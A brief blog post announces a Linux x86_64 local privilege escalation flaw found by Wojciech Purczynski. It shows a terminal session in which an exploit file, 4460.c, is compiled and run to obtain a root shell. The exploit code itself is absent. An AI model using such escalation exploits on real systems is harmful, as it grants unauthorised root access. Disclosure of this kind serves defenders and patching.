Linux Local Privilege Escalation for x86_64

Wojciech Purczynski found an interesting vulnerability which allows non-priv users on Linux x86_64 systems to escalate privileges to root:

user@linux64 /tmp $ uname -a Linux ws 2.6.22-gentoo-r5 #1 SMP Mon Sep 24 00:24:36 BST 2007 x86_64 Intel(R) Core(TM)2 Quad CPU Q6600 @ 2.40GHz GenuineIntel GNU/Linux
user@linux64 /tmp $ gcc -o 4460 4460.c
user@linux64 /tmp $ ./4460
UID 0, EUID:0 GID:70, EGID:70
sh-3.2# id
uid=0(root) gid=99(user) groups=99(user)

                

Tags: ,

Posted in Blog